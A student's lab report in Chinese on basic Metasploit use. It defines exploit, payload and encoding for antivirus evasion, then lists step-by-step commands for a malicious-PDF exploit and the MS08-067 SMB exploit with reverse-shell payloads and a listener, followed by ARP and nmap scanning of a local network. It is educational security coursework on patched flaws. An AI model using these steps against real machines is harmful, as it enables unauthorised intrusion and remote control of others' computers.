20145205武钰_Exp5 MSF基础应用

实验后回答问题

exploit：这个词本身只是利用，但是它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit（利用)。有Exploit就肯定有漏洞。但是对我来说这个词就是一个简单的指令执行词，就是个指令代码，并没有什么特别的，就是我们需要在MSF中进行执行了，敲一下就好。
payload：其实吧我对这个词理解不深，就感觉是我们的恶意代码要在靶机中可以做的事情，其实就是我们生产的恶意代码具体可以干什么。
encode：在我们学习了英语后我们都知道“en”是一个动词，所以encode就是对于我们之前的恶意代码进行一个再编译的过程，达到我们的目的——免杀

我们这个的实验是用已经被修补的漏洞，然后我们只是在前人的基础上感受了一把通过微软漏洞进行的攻击的感觉，只要我们平时及时下载补丁，修补我们的漏洞，其实黑客是很难对我们进行漏洞的渗透攻击的，而且我们也要注意上网习惯，注意一些的奇怪的域名，小心被“钓鱼“，而且我感觉这次实验的实际步骤应该是先进行局域网内的端口扫描，获得目标靶机的IP地址，之后进行主动攻击，获得目标机的权限，之后或是传输到靶机生产的PDF文件，或是将靶机的浏览器主页换成我们的钓鱼网页都是可以的。
还有就是为了找到一个和大家不相同的漏洞，本来是想在MSF里直接搜一个挑个来做的，但是密密麻麻的英文让我退却了，然后就在百度上自己随便输了个漏洞年号，之后去看常用的搜索项，也是佩服我自己的聪明才智。

在kali终端中开启msfconsole
输入命令use exploit/windows/fileformat/adobe_cooltype_sing进入该漏洞模块
使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷
输入命令show options显示模块设定参数，然后按照我们自己的情况进行修改
在设定完成后，生产PDF文件，然后将PDF文件拖入到靶机中，之后就像是我们之前做的恶意代码实验一样。
建立一个监听模块，use exploit/multi/handler
使用set payload windows/meterpreter/reverse_tcp建立一个可靠的反弹链接，监听模块的端口也是需要我们按照自己的情况进行设定的。
最后exploit开启监听模块在靶机中打开问题PDF，即可获得靶机权限。
但是这种方式靶机那边的PDF并不会打开，就像是程序崩溃的感觉一样，但是如果关闭了问题PDF文件，靶机同kali的链接就会中断，而且我们也可以通过网络资源发现靶机正在和kali进行链接。

输入use exploit/windows/smb/ms08_067_netapi，进入该漏洞模块的使用，在输入命令时时不时TAB一下会省很多功夫，建议没事多点一下TAB
之后依然是设置有效攻击载荷，输入set payload generic/shell_reverse_tcp进入载荷模块，之后show options查看具体参数，然后修改参数。
这里我们需要注意点的一点是，LHOST是本机地址，RHOST是靶机IP，设置好后，输入我们的开启攻击的号角exploit
对比可知我们获得了靶机的管理员权限

将kali机的模式改为桥接模式，因为这个在实际应用中最好我们可以使用公网地址，虽然这样会被抓，或是在无线局域网中使用桥接模式，可以保证和其他在这个局域网中的主机在同一个网段中，可以ping通。
本次实验是实践一下两种进行网络中对于其他主机扫描的辅助模块
为了提升一下扫描速度，我们可以预先建立msf数据库，在kali的终端中依次输入以下命令service postgresql start之后输入msfdb start
然后进入msf
输入use auxiliary/scanner/discovery/arp_sweep进入模块，然后输入show options查看并修改参数
然后根据自身的情况修改参数
然后就可以开始扫描了了，因为是辅助模块，并没有进行漏洞渗透攻击，所以我们的启动指令是run，然后可以看到这个局域网中除了自己的主机，其他的主机，因为我当时只开了kali，所以只会扫描到我的win 10主机
在确认可以ping通后，使用nmap进行开放端口扫描，探知该主机开放的端口和服务